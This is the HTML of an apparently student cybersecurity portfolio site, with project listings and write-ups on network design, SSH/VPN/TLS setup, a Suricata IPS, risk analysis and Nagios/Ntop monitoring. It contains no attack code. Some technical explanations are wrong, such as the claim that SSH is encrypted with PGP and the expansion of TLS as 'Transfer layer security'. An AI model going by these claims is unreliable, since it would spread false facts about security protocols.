          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
